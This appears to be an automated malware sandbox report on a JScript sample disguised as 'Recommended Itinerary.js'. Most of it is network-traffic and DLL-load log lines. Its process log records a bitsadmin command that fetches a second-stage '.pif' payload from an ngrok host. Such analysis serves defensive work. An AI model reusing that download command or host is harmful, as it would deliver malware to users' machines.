Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.11.20:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.11.20:49751 version: TLS 1.2

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: Recommended Itinerary.jsInitial sample: Strings found which are bigger than 50
Source: BIT24FD.tmp.4.drStatic PE information: No import functions for PE file found
Source: classification engineClassification label: mal72.evad.winJS@5/5@1/2
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\BIT24FD.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:800:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:800:120:WilError_03
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recommended Itinerary.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://041224.ngrok-free.app//BITZX.pif C:\Users\user\BITZX.pif
Source: C:\Windows\System32\bitsadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://041224.ngrok-free.app//BITZX.pif C:\Users\user\BITZX.pifJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
